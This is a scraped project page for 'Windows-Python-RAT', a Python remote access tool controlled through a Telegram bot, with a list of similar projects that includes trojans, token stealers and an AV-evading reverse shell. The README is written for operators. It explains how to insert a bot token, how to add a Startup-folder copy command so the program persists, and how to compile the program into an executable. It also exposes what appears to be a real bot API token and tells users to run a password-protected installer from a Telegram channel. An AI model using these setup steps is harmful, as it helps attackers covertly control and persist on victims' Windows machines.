All Projects → The404Hacking → Windows-Python-RAT

The404Hacking / Windows-Python-RAT

Licence: other
A New Microsoft Windows Remote Administrator Tool [RAT] with Python by Sir.4m1R.

Programming Languages

python
139335 projects - #7 most used programming language

Projects that are alternatives of or similar to Windows-Python-RAT

The-MALWARE-Repo
A repository full of malware samples.
Stars: ✭ 380 (+442.86%)
Mutual labels:  rat, remote-admin-tool, remote-access-trojan
SpyNote
SpyNote V6.4
Stars: ✭ 73 (+4.29%)
Mutual labels:  rat, remote-administrator-tool
Auth Module
auth.nuxtjs.org
Stars: ✭ 1,624 (+2220%)
Mutual labels:  module, token
pace
Remote Access Tool for Windows.
Stars: ✭ 68 (-2.86%)
Mutual labels:  rat, remote-admin-tool
ToxicEye
👽 Program for remote control of windows computers via telegram bot. Written in C#
Stars: ✭ 305 (+335.71%)
Mutual labels:  rat, remote-access-trojan
Robotics setup
Setup Ubuntu 18.04, 16.04 and 14.04 with machine learning and robotics software plus user configuration. Includes ceres tensorflow ros caffe vrep eigen cudnn and cuda plus many more.
Stars: ✭ 110 (+57.14%)
Mutual labels:  setup, robot
Pupy
Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python
Stars: ✭ 6,737 (+9524.29%)
Mutual labels:  rat, remote-admin-tool
qt-rat
Remote administration tool with Qt5
Stars: ✭ 37 (-47.14%)
Mutual labels:  rat, remote-administrator-tool
Quiescis
Quescis is a powerful Remote Access Trojan for windows 💻 on C++
Stars: ✭ 56 (-20%)
Mutual labels:  rat, remote-access-trojan
Discord-AIO
Discord AIO (All In One) - discord stealer/token grabber builder with token checks, webhook spammer, obfuscation, encryption, crypto miner, RAT and a lot of extra features.
Stars: ✭ 105 (+50%)
Mutual labels:  rat, token
greed
A customizable, multilanguage Telegram shop bot with Telegram Payments support
Stars: ✭ 268 (+282.86%)
Mutual labels:  python-telegram-bot
spdlog setup
spdlog setup initialization via file configuration for convenience.
Stars: ✭ 68 (-2.86%)
Mutual labels:  setup
mac-dev-setup
An easy script to install your mac dev environment
Stars: ✭ 38 (-45.71%)
Mutual labels:  setup
guess-module
Guess.js integration for Nuxt.js with guess-webpack
Stars: ✭ 20 (-71.43%)
Mutual labels:  module
Spring-Api-APP
用以快速构建APP专用的API后台系统,可选全接口加密,保证数据安全,全局异常处理,使用Token作为无状态登录验证,security做权限验证,swagger-2-API可视化及调试,可以作为微服务使用
Stars: ✭ 51 (-27.14%)
Mutual labels:  token
Unity.IO.Compression
A port of System.IO.Compression for Unity
Stars: ✭ 73 (+4.29%)
Mutual labels:  microsoft
puppetlabs-vcsrepo
Support for source control repositories
Stars: ✭ 228 (+225.71%)
Mutual labels:  module
woapp
web模拟安卓操作系统,php开发,内置文件管理,电话,短信,拍照,用在树莓派上可做智能家居,视频监控,机顶盒等……
Stars: ✭ 22 (-68.57%)
Mutual labels:  robot
spatialmath-matlab
Create, manipulate and convert representations of position and orientation in 2D or 3D using Python
Stars: ✭ 142 (+102.86%)
Mutual labels:  robot
dark-lord-obama
AV-evading Pythonic Reverse Shell with Dynamic Adaption Capabilities
Stars: ✭ 61 (-12.86%)
Mutual labels:  rat

Windows-Python-RAT

Microsoft Windows Remote Administrator Tool

Language: Python
Coder: Sir.4m1R
Developer: Ahoora Mansouri

Powered By The404Hacking
Digital Security ReSearch Group

Robot for initial Windows-Python-RAT testing

Bot ID: @W_P_RAT_Bot

Token: 586363223:AAHSLdPnAE60avs_T25l_HjzRahtw6PhxDY


Set Bot API-Token

To replace your robot Token in RAT, simply go to Line 35 in the Windows-Python-RAT.py file and place your API-TOKEN instead of TOKEN.

In Line 35:

#Replace Your Bot API-TOKEN
update = Updater("TOKEN")

Example for Replace Token:

Replace Token

StartUP Setting

For startup setting, you must first write the name of your bot before compiling it in the Windows-Python-RAT.py file. For example, before compiling the RAT file, you need to go to line 281 and name it as an YOUR-COMPILED-RAT-NAME.exe.

In Line 281:

os.system('copy YOUR-COMPILED-RAT-NAME.exe "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"')
#replace your rat name on 'YOUR-COMPILED-RAT-NAME.exe'

Video Tutorial Setting Up a Startup on a RAT: Watch

StartUP Setting

Python

Windows-Python-RAT requires Python version 2.7.x

Download Python Version 2.7.13: Click Here


Download Python

Python 2.7.14 - 2017-09-16

Download for Windows (.msi)


Install Python

Learning Install Python on Microsoft Windows: Click Here


Module in Python

To use the Windows-Python-RAT, you need to install the following modules in your python.

For automatic installation, you can first open the Setup.py (python Setup.py) file and select the [1] Install Module option.

To install the modules manually, simply enter the commands for installing each module in your CMD or Terminal.

Module List:

  • Upgrade pip

python -m pip install --upgrade pip

  • Python Telegram Bot (Telegram API for Python)

python -m pip install python-telegram-bot

  • Pyttsx (for Play Voice)

python -m pip install pyttsx

  • PyInstaller (for Compile py file)

python -m pip install pyinstaller

  • Autopy (for Take Screenshot)

Download from Telegram Channel or PicoFile and Click on Autopy.exe for Install.

Password autopy-[@The404Hacking].rar File is: @The404Hacking


AutoPy Module in Python

learning Install AutoPy Module on Python 2: Watch

Download from Telegram Channel or PicoFile and Click on Autopy.exe for Install.

Password autopy-[@The404Hacking].rar File is: @The404Hacking


Clone and Run Setup

  • Linux:
git clone ‎https://github.com/The404Hacking/Windows-Python-RAT.git
cd Windows-Python-RAT
python Setup.py
  • Windows:
Download from ‎https://github.com/The404Hacking/Windows-Python-RAT/archive/master.zip
Windows-Python-RAT-master.zip
Extract files.
cd Windows-Python-RAT
python Setup.py

Logo:

Windows-Python-RAT Logo

Setup ScreenShot:

Setup ScreenShot

RAT Control Panel @W_P_RAT_Bot:

RAT Control Panel ScreenShot1

RAT Control Panel ScreenShot2

Download and Clone

Download: Click Here

Clone: git clone https://github.com/The404Hacking/Windows-Python-RAT.git

The404Hacking | Digital UnderGround Team

The404Hacking

Follow us !

The404Hacking - The404Cracking

Instagram - GitHub

YouTube - Aparat

Blog - Email

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].